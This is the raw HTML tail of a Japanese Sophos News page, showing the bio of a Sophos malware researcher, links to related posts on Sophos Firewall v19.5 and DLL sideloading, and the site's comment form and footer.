								<p>Gabor graduated from the Eotvos Lorand University of Budapest with a degree in physics. His first job was in the Computer and Automation Research Institute, developing diagnostic software and hardware for nuclear power plants. He started antivirus work in 1995, and began developing freeware antivirus solutions in his spare time. Gabor joined VirusBuster in 2001 where he was responsible for taking care of macro virus and script malware and became head of the virus lab in 2002. In 2008 he became a member of the Board of Directors in AMTSO (Anti Malware Testing Standards Organization) and, in 2012, joined Sophos as a Principal Malware Researcher.</p>
							</div> <!-- .author-bio -->

					</div>
				</div>

			</div> <!-- .author-block-container -->
		
		</div>
				</div>
			</div>

			
<div class="pb-24 bg-white">
<div class="container">
<div class="max-w-5xl mx-auto">

			
			<h3 class="text-style-h2 md:my-8 my-4">
				関連記事を読む			</h3>

			<div class="article-grid article-grid--3-column">
				<!-- Article -->
<article
	id="post-88097"
	class="hover:shadow-lg dark:bg-sophos-gray-900 border-sophos-gray-200 flex flex-col overflow-hidden text-gray-700 transition-all bg-white border rounded-md shadow-md post-88097 post type-post status-publish format-standard has-post-thumbnail hentry category-products-services tag-network-2 tag-sfos-v19-5 tag-sophos-firewall region-ja-jp">
	<!-- Image -->
	<a
		class="aspect-w-16 aspect-h-9 flex block bg-gray-400 bg-right bg-no-repeat bg-cover"
		href="https://news.sophos.com/ja-jp/2022/11/08/sophos-firewall-v19-5-high-availability-enhancements-jp/"
		rel="bookmark"
		style="
			background-image: url('https://news.sophos.com/wp-content/uploads/2022/10/Sophos-Firewall-6.png?w=640');
		"
	></a>

	<!-- Wrapper -->
	<div class="flex flex-col justify-between flex-grow">

		<!-- Content -->
		<div class="sm:px-8 sm:py-8 p-4 py-6">
			<!-- Date -->
			<div
				class="text-sophos-blue-600 font-sansMedium mb-2 text-xs leading-tight uppercase truncate"
			>
				2022、 11月 8			</div>
			<!-- Post Title -->
				<h2 class="text-style-h2 line-clamp-3 sm:mb-4 sm:text-2xl sm:leading-snug text-lg leading-tight text-gray-700"><a href="https://news.sophos.com/ja-jp/2022/11/08/sophos-firewall-v19-5-high-availability-enhancements-jp/" rel="bookmark" class="dark:text-white font-sansSemiBold font-semibold text-gray-900 no-underline cursor-pointer">Sophos Firewall v19.5:高可用性の強化</a></h2>			<!-- Excerpt -->
						</div>

			</div>
</article>
<!-- Article -->
<article
	id="post-88054"
	class="hover:shadow-lg dark:bg-sophos-gray-900 border-sophos-gray-200 flex flex-col overflow-hidden text-gray-700 transition-all bg-white border rounded-md shadow-md post-88054 post type-post status-publish format-standard has-post-thumbnail hentry category-security-operations region-ja-jp">
	<!-- Image -->
	<a
		class="aspect-w-16 aspect-h-9 flex block bg-gray-400 bg-right bg-no-repeat bg-cover"
		href="https://news.sophos.com/ja-jp/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp/"
		rel="bookmark"
		style="
			background-image: url('https://news.sophos.com/wp-content/uploads/2022/11/shutterstock_188747756.jpg?w=640');
		"
	></a>

	<!-- Wrapper -->
	<div class="flex flex-col justify-between flex-grow">

		<!-- Content -->
		<div class="sm:px-8 sm:py-8 p-4 py-6">
			<!-- Date -->
			<div
				class="text-sophos-blue-600 font-sansMedium mb-2 text-xs leading-tight uppercase truncate"
			>
				2022、 11月 3			</div>
			<!-- Post Title -->
				<h2 class="text-style-h2 line-clamp-3 sm:mb-4 sm:text-2xl sm:leading-snug text-lg leading-tight text-gray-700"><a href="https://news.sophos.com/ja-jp/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp/" rel="bookmark" class="dark:text-white font-sansSemiBold font-semibold text-gray-900 no-underline cursor-pointer">DLL サイドローディングを用いた 5 件の攻撃の共通点とは</a></h2>			<!-- Excerpt -->
						</div>

			</div>
</article>
<!-- Article -->
<article
	id="post-88086"
	class="hover:shadow-lg dark:bg-sophos-gray-900 border-sophos-gray-200 flex flex-col overflow-hidden text-gray-700 transition-all bg-white border rounded-md shadow-md post-88086 post type-post status-publish format-standard has-post-thumbnail hentry category-products-services tag-network-2 tag-sfos-v19-5 tag-sophos-firewall region-ja-jp">
	<!-- Image -->
	<a
		class="aspect-w-16 aspect-h-9 flex block bg-gray-400 bg-right bg-no-repeat bg-cover"
		href="https://news.sophos.com/ja-jp/2022/10/31/sophos-firewall-v19-5-hosts-and-services-search-jp/"
		rel="bookmark"
		style="
			background-image: url('https://news.sophos.com/wp-content/uploads/2022/10/Sophos-Firewall-6.png?w=640');
		"
	></a>

	<!-- Wrapper -->
	<div class="flex flex-col justify-between flex-grow">

		<!-- Content -->
		<div class="sm:px-8 sm:py-8 p-4 py-6">
			<!-- Date -->
			<div
				class="text-sophos-blue-600 font-sansMedium mb-2 text-xs leading-tight uppercase truncate"
			>
				2022、 10月 31			</div>
			<!-- Post Title -->
				<h2 class="text-style-h2 line-clamp-3 sm:mb-4 sm:text-2xl sm:leading-snug text-lg leading-tight text-gray-700"><a href="https://news.sophos.com/ja-jp/2022/10/31/sophos-firewall-v19-5-hosts-and-services-search-jp/" rel="bookmark" class="dark:text-white font-sansSemiBold font-semibold text-gray-900 no-underline cursor-pointer">Sophos Firewall v19.5 のホストとサービスの検索</a></h2>			<!-- Excerpt -->
						</div>

			</div>
</article>
			</div>

	
</div>
</div>
</div> <!-- #secondary -->

			
<div class="bg-sophos-gray-50 px-4 pt-16 pb-8" id="comments">

	
	
	<div class="container max-w-2xl py-6 md:py-16">
			<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">コメントを残す <small><a rel="nofollow" id="cancel-comment-reply-link" href="/ja-jp/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp/#respond" style="display:none;">Cancel reply</a></small></h3><form action="https://news.sophos.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> <span class="required-field-message">Required fields are marked <span class="required">*</span></span></p><p class="comment-form-comment"><label for="comment">Comment <span class="required">*</span></label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" required></textarea></p><p class="comment-form-author"><label for="author">Name</label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" autocomplete="name" /></p>
<p class="comment-form-email"><label for="email">Email</label> <input id="email" name="email" type="email" value="" size="30" maxlength="100" aria-describedby="email-notes" autocomplete="email" /></p>
<p class="comment-form-url"><label for="url">Website</label> <input id="url" name="url" type="url" value="" size="30" maxlength="200" autocomplete="url" /></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<input type="hidden" name="redirect_to" value="https://news.sophos.com/ja-jp/2022/11/03/family-tree-dll-sideloading-cases-may-be-related-jp/" id="redirect_to"><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="コメントを投稿" /> <input type='hidden' name='comment_post_ID' value='88054' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="cc31228a2b" /></p><p style="display: none !important;"><label>&#916;<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js" value="86"/><script>document.getElementById( "ak_js_1" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form>	</div><!-- #respond -->
		</div>

</div><!-- #comments -->
</div><!-- #comments -->

		
		</main><!-- #main -->
	</div><!-- #primary -->


	</div> <!-- #content -->

	

	<footer
		class="bg-white border-t border-sophos-gray-200 "
		x-data="{ languageMenu: false, privacyMenu: false, legalMenu: false }"
	>
		<div class="container">
			<div class="md:flex-row md:items-center flex flex-col justify-between py-8">
				<div class="flex items-baseline flex-grow space-x-6">
					<!-- Language -->
					
<div class="relative mr-auto">
	<a
		href="#"
		class="whitespace-nowrap font-sansMedium text-sophos-gray-600 inline-block text-xs font-medium leading-tight"
		@click.prevent="languageMenu = !languageMenu"
		@click.away="languageMenu = false"
	>
		国を変更		<svg
			xmlns="http://www.w3.org/2000/svg"
			width="8"
			height="4"
			class="inline-block transition-transform transform"
			:class="{'rotate-180': languageMenu }"
		>
			<path
				fill="#7F8C9D"
				fill-rule="evenodd"
				d="M4 2.178L5.915.262a.708.708 0 01.996 0 .702.702 0 010 .995L4.75 3.415A.7.7 0 014 3.94a.702.702 0 01-.751-.524l-2.16-2.158a.702.702 0 11.996-.995L4 2.178z"
			/>
		</svg>
	</a>

	<!-- Language Menu -->
	<div
		class="focus:outline-none border-sophos-gray-200 absolute bottom-0 left-0 w-48 px-4 py-1 py-4 mb-8 -ml-4 origin-bottom-left bg-white border rounded-md shadow-md"
		role="menu"
		aria-orientation="vertical"
		aria-labelledby="user-menu"
		x-show="languageMenu"
		x-cloak
		x-transition:enter="transition-all ease-out duration-100"
		x-transition:enter-start="transform opacity-0 scale-95"
		x-transition:enter-end="transform opacity-100 scale-100"
		x-transition:leave="transition ease-in duration-75"
		x-transition:leave-start="transform opacity-100 scale-100"
		x-transition:leave-end="transform opacity-0 scale-95"
	>
		<ul
			class="font-sansMedium text-sophos-gray-600 space-y-1 text-xs font-medium"
		>
											<li>
					<a href="https://news.sophos.com/es-419">
						América Latina					</a>
				</li>
															<li>
					<a href="https://news.sophos.com/pt-br">
						Brasil					</a>
				</li>
											<li>
					<a href="https://news.sophos.com/de-de">
						Deutschland					</a>
				</li>
											<li>
					<a href="https://news.sophos.com/en-us">
						English					</a>
				</li>
											<li>
					<a href="https://news.sophos.com/fr-fr">
						France					</a>
				</li>
											<li>
					<a href="https://news.sophos.com/es-es">
						Iberia					</a>
				</li>
											<li>
					<a href="https://news.sophos.com/it-it">
						Italia					</a>
				</li>
											<li>
					<a href="https://news.sophos.com/ja-jp">
						Japan					</a>
				</li>
									</ul>
	</div>
</div>

					<!-- Terms -->
					<a
						href="https://www.sophos.com/en-us/legal/sophos-website.aspx"
						class="whitespace-nowrap font-sansMedium text-sophos-gray-600 inline-block ml-auto text-xs font-medium leading-tight"
						>規約</a
					>

					<!-- Privacy -->
					
<span class="relative">
	<a
		href="#"
		class="whitespace-nowrap font-sansMedium text-sophos-gray-600 inline-block text-xs font-medium leading-tight"
		@click.prevent="privacyMenu = !privacyMenu"
		@click.away="privacyMenu = false"
	>
		プライバシー
		<svg
			xmlns="http://www.w3.org/2000/svg"
			width="8"
			height="4"
			class="inline-block transition-transform transform"
			:class="{'rotate-180': privacyMenu }"
		>
			<path
				fill="#7F8C9D"
				fill-rule="evenodd"
				d="M4 2.178L5.915.262a.708.708 0 01.996 0 .702.702 0 010 .995L4.75 3.415A.7.7 0 014 3.94a.702.702 0 01-.751-.524l-2.16-2.158a.702.702 0 11.996-.995L4 2.178z"
			/>
		</svg>
	</a>
	<div
		class="focus:outline-none border-sophos-gray-200 absolute bottom-0 left-0 w-48 px-4 py-1 py-4 mb-8 -ml-4 origin-bottom-left bg-white border rounded-md shadow-md"
		role="menu"
		aria-orientation="vertical"
		aria-labelledby="user-menu"
		x-show="privacyMenu"
		x-cloak
		x-transition:enter="transition-all ease-out duration-100"
		x-transition:enter-start="transform opacity-0 scale-95"
		x-transition:enter-end="transform opacity-100 scale-100"
		x-transition:leave="transition ease-in duration-75"
		x-transition:leave-start="transform opacity-100 scale-100"
		x-transition:leave-end="transform opacity-0 scale-95"
	>
		<ul
			class="font-sansMedium text-sophos-gray-600 space-y-1 text-xs font-medium"
		>
			<li>
				<a
					href="https://www.sophos.com/en-us/legal/sophos-group-privacy-policy.aspx"
				>
					個人情報保護通知				</a>
			</li>
			<li>
				<a
					href="https://www.sophos.com/en-us/legal/cookie-information.aspx"
				>
					Cookie				</a>
			</li>
		</ul>
	</div>
</span>

					<!-- Legal -->
					
<span class="relative">
	<a
		href="#"
		class="whitespace-nowrap font-sansMedium text-sophos-gray-600 inline-block text-xs font-medium leading-tight"
		@click.prevent="legalMenu = !legalMenu"
		@click.away="legalMenu = false"
	>
		リーガル
		<svg
			xmlns="http://www.w3.org/2000/svg"
			width="8"
			height="4"
			class="inline-block transition-transform transform"
			:class="{'rotate-180': legalMenu }"
		>
			<path
				fill="#7F8C9D"
				fill-rule="evenodd"
				d="M4 2.178L5.915.262a.708.708 0 01.996 0 .702.702 0 010 .995L4.75 3.415A.7.7 0 014 3.94a.702.702 0 01-.751-.524l-2.16-2.158a.702.702 0 11.996-.995L4 2.178z"
			/>
		</svg>
	</a>
	<div
		class="focus:outline-none border-sophos-gray-200 absolute bottom-0 left-0 w-48 px-4 py-1 py-4 mb-8 -ml-4 origin-bottom-left bg-white border rounded-md shadow-md"
		role="menu"
		aria-orientation="vertical"
		aria-labelledby="user-menu"
		x-show="legalMenu"
		x-cloak
		x-transition:enter="transition-all ease-out duration-100"
		x-transition:enter-start="transform opacity-0 scale-95"
		x-transition:enter-end="transform opacity-100 scale-100"
		x-transition:leave="transition ease-in duration-75"
		x-transition:leave-start="transform opacity-100 scale-100"
		x-transition:leave-end="transform opacity-0 scale-95"
	>
		<ul
			class="font-sansMedium text-sophos-gray-600 space-y-1 text-xs font-medium"
		>
			<li>
				<a
					href="https://www.sophos.com/en-us/legal.aspx"
				>
					概要				</a>
			</li>
			<li>
				<a
					href="https://www.sophos.com/en-us/legal/modern-slavery-act-transparency-statement.aspx"
				>
					現代奴隷制に関する声明				</a>
			</li>
			<li>
				<a
					href="https://secure.ethicspoint.eu/domain/media/en/gui/104916/index.html"
				>
					報告する				</a>
			</li>
		</ul>
	</div>
</span>

					<!-- Copyright -->
					<div class="md:ml-6 mt-2 md:mt-0">
						<span
							class="whitespace-nowrap font-sansMedium text-sophos-gray-600 inline-block text-xs font-medium leading-tight"
						>
							&copy; 1997 - 2022 Sophos Ltd. All rights reserved.						</span>
					</div>
				</div>
			</div>
			</div>
		</div>
	</footer>
	<script id='sophos-js-core-js-extra'>
var PG8Data = {"startPage":"1","maxPages":"1","nextLink":""};
</script>
<script type="text/javascript" src="https://news.sophos.com/_static/??-eJyVjFsOwiAQRTckg6BFf4xrmZBJC8ojzNS6fDHdQEnu18k5V29V+ZKFsmhZKBFrLnUpnGljZc/mpiP3dam8AqmPBQumA9gBRD7pQx++tAGbvtKQj/s7glXCe7zymCqGOQ+HFZtkasPdjMPJn/XomR7Gufs0XdzVxh+gzqBG" ></script><script src='https://cdn.jsdelivr.net/gh/alpinejs/alpine@v2.8.1/dist/alpine.min.js?ver=2.0.1' id='alpine-js-js'></script>
<script type="text/javascript" src="https://news.sophos.com/wp-includes/js/comment-reply.min.js?m=1668541476g" ></script>	<script src='https://stats.wp.com/e-202247.js' defer></script>
	<script>
		_stq = window._stq || [];
		_stq.push([ 'view', {v:'ext',blog:'166161023',post:'88054',tz:'-5',srv:'news.sophos.com',hp:'vip',j:'1:11.5.1'} ]);
		_stq.push([ 'clickTrackerInit', '166161023', '88054' ]);
	</script></body>
</html>
